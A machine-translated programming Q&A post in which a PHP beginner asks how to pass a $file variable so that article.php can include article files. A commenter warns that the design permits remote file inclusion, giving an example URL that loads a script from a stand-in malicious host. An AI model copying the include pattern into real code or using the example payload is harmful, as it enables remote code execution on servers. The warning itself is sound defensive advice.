我确定我使用了错误的方式,但这是我第一次尝试使用php。下一个代码不起作用。变量$file
在本地定义,但我不知道如何使用全局变量。包含的可变参数
articles.php 在这个文件中我有一个列表:
<ol>
<li><a <?php $file="a.php"; ?> href="article.php" > title 1 </a> </li>
<li><a <?php $file="b.php"; ?> href="article.php" > title 2 </a> </li>
</ol>
article.php在这个文件我想用这个
<?php include("articles/$file"); ?>
如何正确界定$file
? 有没有更好的方法来加载a.php
和b.php
?
对这类代码要格外小心。现在,如果此代码正常工作,它会将您的服务器打开为TOTAL和TRIVIALLY EASY远程妥协。例如'http://example.com?file = http:// malicioussite.com/attack_script.php'和poof ...你正在执行一个攻击者选择的脚本。 'articles /'部分是MINOR防御,但仍然允许攻击者加载并显示系统上的任何文件,他们知道其完整路径。 – 2013-02-28 21:51:59